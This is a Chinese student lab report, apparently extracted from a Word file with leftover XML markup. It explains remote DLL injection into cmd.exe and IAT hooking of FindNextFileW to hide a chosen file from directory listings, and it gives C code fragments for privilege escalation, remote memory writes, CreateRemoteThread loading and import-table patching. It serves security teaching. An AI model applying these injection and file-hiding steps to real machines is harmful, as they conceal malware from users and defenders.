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实验一  进程注入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实验目的：实现基于IAT hook的文件隐藏功能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实验内容：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分析explorer.exe和cmd.exe等可以查看文件目录的系统程序遍历文件的实现机制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通过IAT Hook的方法篡改它们的导入表，使这两个程序查看不到文件系统中指定名称的文件。 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三 实验过程</w:t>
      </w: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主程序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功能：将自己编写的包含有攻击代码的dll文件注入到目标进程（本实验选择注入到“cmd.exe”）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代码逻辑：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提升本进程权限——&gt;获取目标进程的PID——&gt;获得要注入进程的句柄——&gt;在远程进程中开辟出一段内存——&gt;将包含恶意代码的dll的名字写入上一步开辟出的内存中——&gt;在被注入进程中创建新线程加载该dll——&gt;卸载注入的dll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实现细节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①提升本进程权限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*目的：在操作系统进程时，需要提升自己编写的进程到系统权限，以免发生操作失败现象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*所用函数：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//获取当前进程句柄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GetCurrentProcess()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//获得进程访问令牌的句柄。第一参数是要修改访问权限的进程句柄；第二个参数指定要进行的操作类型（TOKEN_ADJUST_PRIVILEGES：修改令牌的访问权限，TOKEN_QUERY：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"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</w:rPr>
        <w:t>查询令牌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）；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第三个参数是返回的访问令牌指针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OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>);：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//获取一个权限对应的LUID值（代表指定的特权名称），第一个参数是系统的名称（本地系统为NULL），第二个参数指明权限的名称（SE_DEBUG_NAME：Required to debug and adjust the memory of a process owned by another account.）；第三个参数返回LUID的指针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LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &amp;luid);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//根据上一步获取的LUID值，为相应特权赋予新的特权属性（SE_PRIVILEGE_ENABLED：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"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</w:rPr>
        <w:t>特权启用.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"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TOKEN_PRIVILEGES tkp; tkp.Privileges[0].Luid = luid; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;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//对之前获得的访问令牌进行修改，使进程获得调试权。第一个参数是访问令牌的句柄；第二个参数为FALSE表示根据后一个参数进行权限修改；第三个参数指明要修改的权限，是一个指向TOKEN_PRIVILEGES结构的指针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AdjustTokenPrivileges(hToken, FALSE, &amp;tkp, sizeof tkp, NULL, NULL);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②获取目标进程的PID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*目的：PID为进程唯一标识，获取后方便后面获取目标进程的句柄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*所用函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>getProcessHandle();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③获得要注入进程的句柄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*目的：获得目标进程操作内存空间的权限(可用VirtualProtectEx和WriteProcessMemory)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*所用函数：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HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwpid);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④在远程进程中开辟出一段内存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*目的：开辟空间用来存放要调用的dll的路径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*所用函数：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 xml:space="preserve">//name + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’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\0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="1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DWORD dwSize = strlen(lpDllName) + 1;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在指定进程内开辟虚拟空间，第一个参数：申请内存所在的进程句柄；第二个参数：保留页面的内存地址；一般用NULL自动分配；第三个参数：欲分配的内存大小。MEM_COMMIT：为特定的页面区域分配物理存储；PAGE_READWRITE：区域可被应用程序读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LPVOID lpRemoteBuf = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);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⑤将包含恶意代码的dll的名字写入上一步开辟出的内存中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*所用函数：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//写入内存，函数执行成功返回写入的字节数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WriteProcessMemory(hProcess, lpRemoteBuf, lpDllName, dwSize,(SIZE_T*)&amp;dwHasWrite)；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//若写入失败，应释放之前分配的内存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VirtualFreeEx(hProcess, lpRemoteBuf, dwSize, MEM_COMMIT);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⑥在被注入进程中创建新线程加载该dll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*目的：调用dll执行恶意代码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*所用函数：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DWORD dwNewThreadId;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//使用LoadLibrary函数来加载动态链接库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LPVOID lpLoadDll = LoadLibraryA;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//创建远程线程，第一个参数为线程所属进程的进程句柄；第三个参数为线程初始大小,以字节为单位,如果该值设为0,那么使用系统默认大小；第四个参数为在远程进程的地址空间中,该线程的线程函数的起始地址.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HANDLE hNewRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpLoadDll, lpRemoteBuf, 0, &amp;dwNewThreadId);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⑦卸载注入的dll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*思路：获得在远程线程中被注入的Dll的句柄 —&gt; 卸载Dll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*所用函数：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//获得在远程线程中被注入的Dll的句柄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LPVOID pFunc = GetModuleHandleA; //获取DLL模块的路径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HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, lpRemoteBuf, 0, &amp;dwID);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GetExitCodeThread(hThread, &amp;dwHandle);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 xml:space="preserve"> //线程的结束码即为Dll模块儿的句柄，存入dwHandle中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//将FreeLibraryA注入到远程线程中卸载Dll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pFunc = FreeLibrary;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hThread = CreateRemoteThread(hThread, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, (LPVOID)dwHandle, 0, &amp;dwID);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IATHOOK程序（fakedll.dll中调用的攻击代码）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功能：程序中每个调用 API 函数的 CALL 指令所使用的地址都是相应函数登记在 IAT 表的地址，我们将目标进程（cmd.exe）中的FindNextFileW函数（遍历文件目录时使用，存储了文件名等信息）在IAT表中的地址替换为攻击者编写的虚假FindNextFileW函数地址，其中在读到指定文件时在cmd.exe界面上不会显示该文件文件名，起到文件隐藏的作用。程序中每个调用 API 函数的 CALL 指令所使用的地址都是相应函数登记在 IAT 表的地址。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代码逻辑：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8595" cy="3160395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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具体实现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编写假API函数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*思路：先调用原始findnextfile函数，根据返回的文件名确定是否是要隐藏的文件，若是则不显示此次调用的结果，直接再次调用findnextfile函数；若不是则将结果直接返回。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*实现代码：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//遍历IAT表获得API函数真实地址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pHookBlock-&gt;pOrigin = (void*)pRealThunk-&gt;u1.Function;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//调用原始findnextfile函数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bool  val = fnOrigin(hFindFile, lpFindFileData);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//返回结果的文件名与待隐藏文件文件名比较，相同则跳过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(0 == wcscmp(File, (wchar_t*)lpFindFileData-&gt;cFileName))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//调用之后进行判断是否为目标文件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{return fnOrigin(hFindFile, lpFindFileData);}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②申请一块空白空间来放置假API函数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*实现代码：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//分配指定大小内存空间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pMemory = malloc(nNeedSize);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//清零该内存空间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RtlZeroMemory(pMemory, nNeedSize);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③将有关参数写入申请的内存中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*实现代码：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pHookBlock-&gt;pImageBase = pImageBase;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//写入dll文件的基地址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pHookBlock-&gt;pszImportDllName = pszImportDllName;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//写入加载的dll名称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pHookBlock-&gt;pszRoutineName = pszRoutineName;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//写入调用的API函数的名称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pHookBlock-&gt;pFake = pFakeRoutine;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//写入编写的假API函数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④获取目标进程导入表地址，遍历导入表获得findnextfile函数所在dll的位置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*实现代码：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//dos头位于进程基地址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pDosHeader = (IMAGE_DOS_HEADER*)pHookBlock-&gt;pImageBase;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//通过dos头找到nt头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pNTHeaders = (IMAGE_NT_HEADERS*)((UCHAR*)pHookBlock-&gt;pImageBase + pDosHeader-&gt;e_lfanew);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//获取导入表实际地址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pImportDescriptor = (IMAGE_IMPORT_DESCRIPTOR*)((UCHAR*)pDosHeader + pNTHeaders-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);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(; (pImportDescriptor-&gt;Name != 0); pImportDescriptor++)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pszImportDllName = (char*)pHookBlock-&gt;pImageBase + pImportDescriptor-&gt;Name;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(NULL != pHookBlock-&gt;pszImportDllName)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//比较是否是需要寻找的dll，找到地址后进行下一步操作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 (0 != _stricmp(pszImportDllName, pHookBlock-&gt;pszImportDllName))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continue;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⑤ 找到指定dll的地址后，在IAT表中该dll下包含的API函数中寻找findnextfile加载后的实际地址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*实现代码：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pOriginThunk = (IMAGE_THUNK_DATA*)((UCHAR*)pHookBlock-&gt;pImageBase + pImportDescriptor-&gt;OriginalFirstThunk);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//指向INT表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pRealThunk = (IMAGE_THUNK_DATA*)((UCHAR*)pHookBlock-&gt;pImageBase + pImportDescriptor-&gt;FirstThunk);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//在PE文件装入内存之后，FirstThunk所指向的IMAGE_THUNK_DATA数组内容变更为导入函数的实际地址（IAT表）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//循环测试，找到API函数实际地址后进行下一步操作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(; 0 != pOriginThunk-&gt;u1.Function; pOriginThunk++, pRealThunk++)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//pOriginThunk-&gt;u1.Function：待扫描函数个数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 ((USHORT)pHookBlock-&gt;pszRoutineName == LOWORD(pOriginThunk-&gt;u1.Ordinal))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pHookBlock-&gt;pOrigin = (void*)pRealThunk-&gt;u1.Function;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_IATHook_InterlockedExchangePointer((void**)&amp;pRealThunk-&gt;u1.Function, pHookBlock-&gt;pFake);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//进行下一步替换操作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⑥ 更该区域保护属性，使我们对指定内存区域可操作，由此可将原始findnextfile函数的地址替换为假API函数的地址。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*实现代码：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//修改内存属性，第一个参数为要改变属性的内存起始地址；第二个参数为要改变属性的内存区域大小；第三个参数为指定的新属性；第四个参数为原始属性保存位置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bFlag = VirtualProtect(pAddress, sizeof(void*), PAGE_EXECUTE_READWRITE, &amp;nOldProtect);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pWriteableAddr = pAddress; </w:t>
      </w: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//原始findnextfile函数地址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//替换地址，pvalue假函数地址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nOldValue = InterlockedExchangePointer((PVOID*)pWriteableAddr, pValue);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548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//重设内存属性，改为原始值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VirtualProtect(pAddress, sizeof(void*), nOldProtect, &amp;nOldProtect);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待测试目录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03390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DLL注入前后效果比较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2632075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="714375" cy="115570"/>
                <wp:effectExtent l="6350" t="6350" r="2222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6pt;margin-top:207.25pt;height:9.1pt;width:56.25pt;z-index:251661312;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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6gixR1wAAAAoBAAAPAAAA&#10;AAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAF1X82k8CAAB+BAAA&#10;DgAAAAAAAAABACAAAAAm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1375410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="714375" cy="115570"/>
                <wp:effectExtent l="6350" t="6350" r="2222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pt;margin-top:108.3pt;height:9.1pt;width:56.25pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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4bNAw1wAAAAoBAAAPAAAA&#10;AAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAJwQdH08CAAB8BAAA&#10;DgAAAAAAAAABACAAAAAm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1160145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="714375" cy="115570"/>
                <wp:effectExtent l="6350" t="6350" r="22225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3635" y="2074545"/>
                          <a:ext cx="714375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05pt;margin-top:91.35pt;height:9.1pt;width:56.25pt;z-index:251658240;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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uqa3NUA&#10;AAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQCjt&#10;YZhbAgAAiAQAAA4AAAAAAAAAAQAgAAAAJA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5420" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="11430" b="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实验收获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本次实验中，我掌握了远程dll注入和IAThook的基本思想，学习了PE文件的基本格式和运行在windows下程序的工作原理，基本实现了预期功能。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附录（实验代码）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80F5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59FD80F5"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1 "/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="59FD8DAD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59FD8DAD"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1 "/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="5A27EBC4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A27EB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7ECE8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A27ECE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27ED97"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A27ED9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B60FE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2B60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B8651"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2B8651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7">
    <w:nsid w:val="5A2B9B28"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2B9B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73395"/>
    <w:rsid w:val="03037303"/>
    <w:rsid w:val="09E038BE"/>
    <w:rsid w:val="0B0B4E46"/>
    <w:rsid w:val="0B5C1897"/>
    <w:rsid w:val="0E0F7AA7"/>
    <w:rsid w:val="0F2A3204"/>
    <w:rsid w:val="102D2116"/>
    <w:rsid w:val="135426EF"/>
    <w:rsid w:val="14983F17"/>
    <w:rsid w:val="152E175E"/>
    <w:rsid w:val="1A826BA9"/>
    <w:rsid w:val="1A8D6198"/>
    <w:rsid w:val="1C6D5CC1"/>
    <w:rsid w:val="1D4532A7"/>
    <w:rsid w:val="1FFD4286"/>
    <w:rsid w:val="21F1755E"/>
    <w:rsid w:val="24557E14"/>
    <w:rsid w:val="27F82DEC"/>
    <w:rsid w:val="29815D37"/>
    <w:rsid w:val="2FAE0EF3"/>
    <w:rsid w:val="311676E9"/>
    <w:rsid w:val="4D7F7EA0"/>
    <w:rsid w:val="4FAB1C7D"/>
    <w:rsid w:val="52656511"/>
    <w:rsid w:val="54A938B8"/>
    <w:rsid w:val="562F714A"/>
    <w:rsid w:val="59075C55"/>
    <w:rsid w:val="5D376176"/>
    <w:rsid w:val="69DC06E9"/>
    <w:rsid w:val="6A1C6E52"/>
    <w:rsid w:val="6F357F4A"/>
    <w:rsid w:val="707C0DA2"/>
    <w:rsid w:val="79DF0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标题4"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="3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2017-12-06T12:59:00Z</dcterms:created>
  <dc:creator>47892</dc:creator>
  <cp:lastModifiedBy>47892</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-29T08:54:58Z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